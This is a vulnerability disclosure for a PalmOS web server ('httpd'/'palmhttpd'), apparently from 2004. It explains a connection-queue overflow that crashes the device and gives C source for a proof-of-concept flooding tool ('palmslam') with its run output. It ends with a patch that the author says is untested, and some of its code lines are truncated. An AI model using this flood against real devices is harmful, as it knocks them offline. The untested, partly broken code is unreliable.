PalmOS httpd accept() queue overflow DoS vulnerability.


'httpd' for PalmOS was originally written by Jim Rees,
and is a simple webserver for Palm powered PDAs. 
Since the development of httpd for Palm stopped, I
decided to modify 'httpd' slightly, and re-release it
on freshmeat.net.    
However, httpd contains a bug which causes the device
to crash due to a "Fatal Error".  The slightly
modified version of 'httpd' (called palmhttpd)
contains the same bug as the original, as I used Jim's

The bug

The bug allows an attacker to crash the entire device,
causing a "Fatal Error", rendering the device unusable
until it is reset completely.  PalmOS can only handle
1 client connection, but 'httpd' implements a while(1)
loop to accept() connections forever.  Because of
this, httpd will accept more than 1 connection, which
PalmOS literally CANNOT do.  The result is a dialog
box saying "Fatal Error, NetStack1.c  overflowed
accept queue", which "Reset" button.

Below is the offending code:

---from httpd.c

while (1) {          /* Cause of the bug is here! 
PalmOS can only accept 1 client connection! */
        if (f) {
            f = NULL;
        if (fd >= 0) {
            fd = -1;

        /* Accept connections */
        len = sizeof saddr;
        AppNetTimeout = SysTicksPerSecond() * 1;
        if ((fd = accept(sfd, (struct sockaddr *)
&saddr, &len)) < 0) {

Exploiting this DoS vulnerability will crash PalmOS

The exploit

Here is a PoC exploit for the issue:

/* PalmOS httpd accept queue overflow PoC exploit.
 * Compile: gcc palmslam.c -o palmslam
 * -shaun2k2
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#define MAX_CON 1025
int main(int argc, char *argv[]) {
        if(argc < 3) {
                printf("Usage: palmslam <host>

        int sock[MAX_CON];
        int i;
        struct sockaddr_in dest[MAX_CON];
        struct hostent *host;
        if((host = gethostbyname(argv[1])) == -1) {
                printf("Couldn't resolve %s!\n",

        for(i = 0; i <= MAX_CON; i++) {
                if((sock[i] = socket(AF_INET,
SOCK_STREAM, 0)) == -1) {
                        printf("Couldn't create

                dest[i].sin_family = AF_INET;
                dest[i].sin_port =
                dest[i].sin_addr = *((struct in_addr

                if(connect(sock[i], (struct sockaddr
*)&dest[i], sizeof(struct sockaddr)) == -1) {
                        printf("Couldn't connect to %s
on port %s!\n", argv[1], argv[2]);

                printf("%d : Connected!\n", i);

I connected my Sony CLIE to the net via a simple pppd
script, ran palmhttpd, and ran the PoC exploit against

[root@localhost DoS]# ./palmslam 6X.XX.68.XX 80
0 : Connected!
1 : Connected!
2 : Connected!

At this point, my CLIE's screen presented me with the
dialog box.

|              Fatal Error              |    
|                                       |
|                                       |
|  Fatal Alert NetStack1.c, Line 4XXX,  |
|  overflowed accept queue              |            
|                                       |
|                                       |
|                                       |
|                                       |
|          +-----------------+          |
|          |      Reset      |          |
|          +-----------------+          | 
|                                       |

The fix

I have written a simple patch to fix the issue:

--- httpd.c     2004-01-14 17:21:41.000000000 +0000
+++ httpd.1.c   2004-02-08 17:13:33.000000000 +0000
@@ -391,8 +391,15 @@
ifinfo.param.interfaceInfo.ipAddr, host);
     printf("Listening on %s\n", host);

-    while (1) {
-       if (f) {
+    /* Here is where the bug manifests:  PalmOS can
only take 1 client
+     * connection (according to even the PalmOS
programming documentation),
+     * but this loop accept()s connections forever. 
The loop is now commented
+     * out, fixing the bug.
+     * -Shaun2k2
+     */
+        /*while (1) {*/
+       if (f) {
            f = NULL;
@@ -507,7 +514,7 @@


 char html0[] = "HTTP/1.0 200 OK\nMIME-version:
1.0\nContent-type: %s\n\n";

Apply the patch: patch httpd.c httpd.patch

Type 'make' to recompile httpd.  Although I haven't
tested the patch, I assume it works.  Let me know if
it does not.

I will be uploading a patched version of palmhttpd to


This vulnerability was discovered by shaun2k2 / Shaun

Thank you for your time.

